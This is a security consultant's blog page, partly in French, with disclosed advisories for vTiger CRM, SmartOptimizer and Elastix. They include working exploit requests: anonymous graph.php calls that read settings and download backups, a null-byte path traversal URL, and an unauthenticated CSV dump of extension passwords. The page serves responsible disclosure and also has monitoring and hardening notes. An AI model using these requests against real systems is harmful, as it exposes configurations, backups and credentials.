sécurité

Advisory: MEDS-2011-01 – VTigerCRM Anonymous access to Setting Module

0
1 month ago
by Francois.Harvey in

Hi,

Here a old vulnerability submitted to vTiger Team last summer. As the 5.3 release was released some week ago, I can now publish this advisory.

Advisory: MEDS-2011-01 - VTigerCRM Anonymous access to Setting Module
using graph.php
Release Date: 2011-05-08
Author: Francois Harvey, gestion medsecure (francois.harvey at
medsecure dot ca) - http://medsecure.ca
Application: Vtiger CRM 5.2.x, 5.1.x
Severity: High
Risk: High
Vendor Status: notified fixed in 5.3

OVERVIEW

"vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support."

VULNERABILITY

Some module (Many in Setting, but also Portal) from vtiger CRM don't
verify the user access level and may be called in anonymous mode using
the graph.php script. This vulnerability can be used to view or modify
some configurations setting (organisation name, templates, backup).

EXPLOIT

# Show Organization information

http://x.x.x.x/vtigercrm/graph.php?module=Settings&action=OrganizationConfig&parenttab=Settings

# Launching Backup and get the backup file (if enabled)

1) Start a Backup
POST /vtigercrm/graph.php
server_type=local_backup&module=Settings&action=BackupServerConfig&local_server_mode=&parenttab=Settings&enable_local_backup=on&backupnow=Backup+Now

2) Find the backup name in the output
Backed Up Successfully To File : ./backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip

3) Get the Dumpfile
GET /vtigercrm/backups/Vtiger-dd May 2011 hh_mm_ss GMT.zip

FIX

Upgrade to 5.3.x

AUTHOR
François Harvey - CISM/CISSP/TCSE
Professionnel en sécurité de l'information
Gestion medsecure
medsecure.ca - francoisharvey.ca

Présentation – Audits de sécurité des systèmes d’informations

0
5 months ago
by Francois.Harvey in ,

Durant l’été, j’ai eu l’occasion de faire deux présentations aux étudiants de l’UQTR sur les audits de sécurité des systèmes d’information, l’objectif était de discuter des processus d’audit en situation réelle à travers trois études de cas. Malgré que l’essentiel de la présentation était verbal, j’avais créé une présentation sommaire comme référence. La voici à titre indicatif. Bonne lecture!

Présentation audits de sécurité

[MEDS-2010-5] Injection de NULL dans SmartOptimizer

0
1 year ago
by Francois.Harvey in ,

Voici un avis de sécurité pour SmartOptimizer 1.7 et précédente. Une vulnérabilité permet des accès à des types de fichiers non autorisées (exemple code source des applications) en utilisant un null byte (%00) pour contourner la vérification des extensions valides. L’exploitation est très simple : 

smartoptimizer/index.php?../index.php%00.js

Le développeur de ce logiciel à intégré un correctif, ainsi la version 1.8 corrige cette vulnérabilité et est disponible à l’adresse suivante : http://farhadi.ir/works/smartoptimizer

Comment surveiller un contrôleur raid HP sous ESXi

0
1 year ago
by Francois.Harvey in

Pour reprendre une citation de Samul Smiles, mon approche en monitoring peut se résumer par “Un check pour chaque chose et toutes choses checkées“, et ce surtout s’il s’agit d’un contrôleur raid sur un serveur ESXi.  Le script original check_esx_wbem.py publié par David Legeret, ne permettait pas d’identifier les erreurs sur le contrôleur raid sur les serveur HP, ainsi j’ai adapté le script original pour en faire un qui surveille spécifiquement le contrôleur raid en utilisant le support WBEM d’HP sous ESXi.

Output :

WARNING : Logical Volume 0 (RAID 5) - Logical Disk is degraded

Le script est disponible à l’adresse suivante : check_esxi_hpraid_wbem.py

define command{
 command_name check_esxi_hpraid
 command_line $USER1$/check_esxi_hpraid_wbem.py https://$HOSTADDRESS$:5989 USER PASSWORD
}

Conseil sécurité : Toujours utiliser un utilisateur dédié au monitoring… pas root ! et utilisez les variables $USER$ de nagios pour enregistrer le mot de passe (pour ainsi le masquer de l’interface Web)

Publication de vulnérabilité : Elastix unsecure extensions configuration download (MEDS-2010-03)

0
1 year ago
by Francois.Harvey in , ,

Bonjour,

Voici un rapport de vulnérabilité pour la distribution Elastix, ça fait très longtemps que le fournisseur a été notifié, mais le fournisseur désirait attendre la version 2.0 d’Elastix avant la publication de cette vulnérabilité ne soit publiée (le correctif a été intégré dans la revision 1550 d’Elastix).  Pour ceux qui ont assisté à ma conférence à Confoo 2010, cette vulnérabilité avait servit d’exemple pour démontrer que parfois une simple erreur peut causer bien des problèmes !

Bonne lecture !

Advisory: MEDS-2010-03 - Elastix unsecure extensions configuration download
Release Date: 2010-01-13
Author: Francois Harvey, gestion medsecure (francois.harvey at medsecure dot ca) - http://medsecure.ca
Application: Elastix 1.6.X, Elastix 2 (Beta), Fixed in 2.0
Severity: High
Risk: High
Vendor Status: notified 2010-01-13, Fixed in the Last Release (http://elastix.svn.sourceforge.net/viewvc/elastix?view=revision&revision=1550)

OVERVIEW

"Elastix is an appliance software that integrates the best tools available for Asterisk-based PBXs into a single, easy-to-use interface. It also adds its own set of utilities and allows for the creation of third party modules to make it the best software package available for open source telephony."

VULNERABILITY

Elastix have a script to dump the extensions configuration (with both login & password), the script download_csv.php is not protected by ACL, so everybody can call this script.

EXPLOIT 

https://x.x.x.x/modules/extensions_batch/libs/download_csv.php [^]

----------------------
Display Name,"User Extension","Direct DID","Outbound CID","Call Waiting","Secret","Voicemail Status","Voicemail Password","VM Email Address","VM Pager Email Address","VM Options","VM Email Attachment","VM Play CID","VM Play Envelope","VM Delete Vmail","Context"

test,"123","","","DISABLED","my_secret_password","disable","","","","","no","no","no","no","from-internal"
----------------------

SOLUTION
Fixed by the Elastix Team.  (http://elastix.svn.sourceforge.net/viewvc/elastix?view=revision&revision=1550)

Securité sous AsteriskNow

0
1 year ago
by Francois.Harvey in , ,

Dans le monde de la téléphonie open source utilisant Asterisk, trois distributions majeures sont basées sur CentOS sont disponible : Trixbox, Elastix et AsteriskNow, j’ai plusieurs réserves envers la première (sécurité très discutable…), beaucoup moins pour la seconde et très peu pour la dernière qui est ma favorite dans le cadre de déploiement de téléphonie.

Malheureusement, favorite ne veut pas dire parfaite :) Surtout lorsque l’aspect sécurité passe avant celui des fonctionnalités car un des problèmes des distributions linux spécialisés est le partage des configurations sensibles (mots de passe, utilisateur, etc.) de façon générique.

C’est dans ce contexte j’ai publié un script dont l’objectif est d’automatiser un premier niveau de sécurité sous la distribution AsteriskNow : Changement des mots de passes par défault, sécurité du mode console, déconnexion automatique, etc… Ce script ne remplace pas un durcissement en profondeur adapté au type de déploiement requis, mais offre un niveau de sécurité minimal.

Pour plus de détail, visitez la page du script en question : http://medsecure.ca/produits/asterisknow-hardeningbootstraping-script/ (anglais)

On trouve de l’humour partout! même dans les infrastructures d’hameçonnage !

1
2 years ago
by Francois.Harvey in

Malheureusement, il arrive souvent que les sites de phishing interceptent des informations nominatives et privées. C’est encore trop commun de faire une analyse post incident (suite à un spam, RFI ou autres) et de voir des données réelles. Par contre, il arrive quelques fois où l’arnaque est tellement évidente que plutôt que de retrouver des informations réelles nous retrouvons plutôt des informations comme ceci…

Username: So this phisher is pretty cool whats it all about? I should really spread this into the password field to make it look better when you read it, lol.
Password: So I will, so whats up, guy

Oui, il est probable que mon sens de l’humour soit un peu geek…

PHP – Persistent Database Password

1
2 years ago
by Francois.Harvey in

Is storing password in clear text inside a hash is a vulnerability or not ? To me, yes it’s a unsecure design bug and it should be fixed. But others think that untrusted binary extension shouldn’t run anyways and if a bad guys inject a rogue extensions, it’s already game over. So… here it’s. Persistent database password dump proof of concept.

(more…)

Go to Top